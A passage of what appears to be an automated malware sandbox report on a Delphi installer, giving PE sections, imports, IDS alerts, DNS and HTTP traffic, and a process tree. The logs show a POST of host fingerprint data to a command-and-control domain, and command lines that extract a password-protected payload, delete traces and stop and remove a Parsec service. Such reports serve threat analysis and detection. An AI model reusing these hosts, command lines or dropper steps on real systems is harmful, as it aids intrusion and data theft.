                             .itext | 0xb5000 | 0x1688 | 0x1800 | 185e04b9a1f554e31f7f848515dc890c | False | 0.54443359375 | data | 5.971425428435973 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                             .data | 0xb7000 | 0x37a4 | 0x3800 | cab2107c933b696aa5cf0cc6c3fd3980 | False | 0.36097935267857145 | data | 5.048648594372454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .bss | 0xbb000 | 0x6de8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0xc2000 | 0xfdc | 0x1000 | e7d1635e2624b124cfdce6c360ac21cd | False | 0.3798828125 | data | 5.029087481102678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .didata | 0xc3000 | 0x1a4 | 0x200 | 8ced971d8a7705c98b173e255d8c9aa7 | False | 0.345703125 | data | 2.7509822285969876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .edata | 0xc4000 | 0x9a | 0x200 | 8d4e1e508031afe235bf121c80fd7d5f | False | 0.2578125 | data | 1.877162954504408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .tls | 0xc5000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rdata | 0xc6000 | 0x5d | 0x200 | 8f2f090acd9622c88a6a852e72f94e96 | False | 0.189453125 | data | 1.3838943752217987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .rsrc | 0xc7000 | 0x1e5a0 | 0x1e600 | 0ccf407773fbfa810622326e22620cbb | False | 0.18008134002057613 | data | 3.5767248033948214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                             RT_ICON | 0xc7558 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4441489361702128
                             RT_ICON | 0xc79c0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.294672131147541
                             RT_ICON | 0xc8348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.21411819887429642
                             RT_ICON | 0xc93f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.13838174273858922
                             RT_ICON | 0xcb998 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.1069910250354275
                             RT_ICON | 0xcfbc0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.05820418786229741
                             RT_ICON | 0xe03e8 | 0x21f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9807979763136714
                             RT_STRING | 0xe25e4 | 0x360 | data | - | - | 0.34375
                             RT_STRING | 0xe2944 | 0x260 | data | - | - | 0.3256578947368421
                             RT_STRING | 0xe2ba4 | 0x45c | data | - | - | 0.4068100358422939
                             RT_STRING | 0xe3000 | 0x40c | data | - | - | 0.3754826254826255
                             RT_STRING | 0xe340c | 0x2d4 | data | - | - | 0.39226519337016574
                             RT_STRING | 0xe36e0 | 0xb8 | data | - | - | 0.6467391304347826
                             RT_STRING | 0xe3798 | 0x9c | data | - | - | 0.6410256410256411
                             RT_STRING | 0xe3834 | 0x374 | data | - | - | 0.4230769230769231
                             RT_STRING | 0xe3ba8 | 0x398 | data | - | - | 0.3358695652173913
                             RT_STRING | 0xe3f40 | 0x368 | data | - | - | 0.3795871559633027
                             RT_STRING | 0xe42a8 | 0x2a4 | data | - | - | 0.4275147928994083
                             RT_RCDATA | 0xe454c | 0x10 | data | - | - | 1.5
                             RT_RCDATA | 0xe455c | 0x2c4 | data | - | - | 0.6384180790960452
                             RT_RCDATA | 0xe4820 | 0x2c | data | - | - | 1.1818181818181819
                             RT_GROUP_ICON | 0xe484c | 0x68 | data | English | United States | 0.7884615384615384
                             RT_VERSION | 0xe48b4 | 0x584 | data | English | United States | 0.26203966005665724
                             RT_MANIFEST | 0xe4e38 | 0x765 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39091389329107235
                             DLL | Import
                             kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                             comctl32.dll | InitCommonControls
                             version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                             user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                             oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                             netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
                             advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                            Name | Ordinal | Address
                            TMethodImplementationIntercept | 3 | 0x4541a8
                            __dbk_fcall_wrapper | 2 | 0x40d0a0
                            dbkFCallWrapperAddr | 1 | 0x4be63c
                            Language of compilation system | Country where language is spoken | Map
                            English | United States |
                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2024-11-14T02:58:18.030414+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 34.160.111.145 | 443 | TCP
                            2024-11-14T02:58:19.166828+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
                            2024-11-14T02:58:19.902542+0100 | 2051091 | ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) | 1 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
                            2024-11-14T02:58:22.700068+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49709 | TCP
                            2024-11-14T02:59:01.302200+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.5 | 49912 | TCP
                            2024-11-14T02:59:04.548903+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49940 | 104.18.0.181 | 443 | TCP
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 14, 2024 02:58:17.410495043 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:17.410583019 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:17.410686016 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:17.411623001 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:17.411653996 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.030296087 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.030414104 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.035764933 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.035798073 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.036176920 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.084094048 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.131340027 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.227878094 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.228626966 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.228758097 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.236145020 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.236145020 CET | 49707 | 443 | 192.168.2.5 | 34.160.111.145
                            Nov 14, 2024 02:58:18.236179113 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.236196995 CET | 443 | 49707 | 34.160.111.145 | 192.168.2.5
                            Nov 14, 2024 02:58:18.292095900 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:18.292145014 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:18.292241096 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:18.292679071 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:18.292695045 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.166558027 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.166827917 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:19.170890093 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:19.170943022 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.171520948 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.172811031 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:19.172811031 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:19.173105955 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.902570009 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.902652025 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Nov 14, 2024 02:58:19.902714014 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:20.021538019 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3
                            Nov 14, 2024 02:58:20.021574020 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 14, 2024 02:58:17.399267912 CET | 55176 | 53 | 192.168.2.5 | 1.1.1.1
                            Nov 14, 2024 02:58:17.406054974 CET | 53 | 55176 | 1.1.1.1 | 192.168.2.5
                            Nov 14, 2024 02:58:18.257282972 CET | 61770 | 53 | 192.168.2.5 | 1.1.1.1
                            Nov 14, 2024 02:58:18.291127920 CET | 53 | 61770 | 1.1.1.1 | 192.168.2.5
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Nov 14, 2024 02:58:17.399267912 CET | 192.168.2.5 | 1.1.1.1 | 0x9f22 | Standard query (0) | ifconfig.me | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:18.257282972 CET | 192.168.2.5 | 1.1.1.1 | 0xabe6 | Standard query (0) | beautifullyuncluttered.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Nov 14, 2024 02:58:17.406054974 CET | 1.1.1.1 | 192.168.2.5 | 0x9f22 | No error (0) | ifconfig.me | | 34.160.111.145 | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:18.291127920 CET | 1.1.1.1 | 192.168.2.5 | 0xabe6 | No error (0) | beautifullyuncluttered.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:18.291127920 CET | 1.1.1.1 | 192.168.2.5 | 0xabe6 | No error (0) | beautifullyuncluttered.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:21.288808107 CET | 1.1.1.1 | 192.168.2.5 | 0x164b | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Nov 14, 2024 02:58:21.288808107 CET | 1.1.1.1 | 192.168.2.5 | 0x164b | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:52.302520037 CET | 1.1.1.1 | 192.168.2.5 | 0xabb1 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Nov 14, 2024 02:58:52.302520037 CET | 1.1.1.1 | 192.168.2.5 | 0xabb1 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                            Nov 14, 2024 02:58:52.325397968 CET | 1.1.1.1 | 192.168.2.5 | 0x65d2 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Nov 14, 2024 02:58:52.325397968 CET | 1.1.1.1 | 192.168.2.5 | 0x65d2 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                            • ifconfig.me
                            • beautifullyuncluttered.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49707 | 34.160.111.145 | 443 | 5600 | C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            Timestamp | Bytes transferred | Direction | Data
                            2024-11-14 01:58:18 UTC | 196 | OUT | GET /ip HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: ifconfig.me
                            2024-11-14 01:58:18 UTC | 227 | IN | HTTP/1.1 200 OK
                            date: Thu, 14 Nov 2024 01:58:17 GMT
                            content-type: text/plain
                            Content-Length: 14
                            access-control-allow-origin: *
                            via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-11-14 01:58:18 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                            Data Ascii: 173.254.250.91


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | 5600 | C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            Timestamp | Bytes transferred | Direction | Data
                            2024-11-14 01:58:19 UTC | 255 | OUT | POST /?CheckApp HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Content-Length: 158
                            Host: beautifullyuncluttered.com
                            2024-11-14 01:58:19 UTC | 158 | OUT | Data Raw: 66 61 30 37 33 64 62 39 36 31 63 64 33 36 34 63 31 66 30 61 64 62 35 63 35 32 66 62 33 64 66 39 0d 0a 31 30 2e 30 30 2e 31 39 30 34 35 0d 0a 59 65 73 0d 0a 59 65 73 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 44 65 66 65 6e 64 65 72 20 41 6e 74 69 76 69 72 75 73 0d 0a 35 30 36 34 30 37 0d 0a 61 6c 66 6f 6e 73 0d 0a 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 50 53 65 63 57 69 6e 0d 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                            Data Ascii: fa073db961cd364c1f0adb5c52fb3df910.00.19045YesYesMicrosoft Defender Antivirus506407userC:\Users\user\AppData\Roaming\PSecWin173.254.250.91
                            2024-11-14 01:58:19 UTC | 814 | IN | HTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 01:58:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lzgvn2ynsfq4CW6StCGH5zckAzE1bjVhr0frvOUcl0DJo3sIBB3aNlBo%2B%2B1J4q7FNoFPYlDQZfaRtzZYHzh0yljdVpq04AAZSOC%2FyX2MMtVawFgosSJEfLkNQ7pWAwrjRPzDQEW%2B4m0HMA5wKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e23655268fcbd77-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=111587&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2868&recv_bytes=1049&delivery_rate=25951&cwnd=32&unsent_bytes=0&cid=dbfc02e15124099b&ts=756&x=0"
                            2024-11-14 01:58:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Target ID:0
                            Start time:20:58:02
                            Start date:13/11/2024
                            Path:C:\Users\user\Desktop\uu8v4UUzTU.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\uu8v4UUzTU.exe"
                            Imagebase:0x400000
                            File size:50'493'432 bytes
                            MD5 hash:2D2F050E6C898065032CB2686A0EFFCA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:20:58:03
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
                            Imagebase:0x400000
                            File size:3'220'480 bytes
                            MD5 hash:828B7D7624C14BE1F3D8122F6E2FAC53
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:4
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                            Imagebase:0xf70000
                            File size:557'056 bytes
                            MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:7
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C del "SoundNight.7z"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            Imagebase:0x400000
                            File size:4'056'240 bytes
                            MD5 hash:01EF58E7C144C701B2EA01CFC049DBE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:14
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" control Parsec 200
                            Imagebase:0x7ff6068e0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\taskkill.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
                            Imagebase:0x700000
                            File size:74'240 bytes
                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" stop Parsec
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" delete Parsec
                            Imagebase:0x8b0000
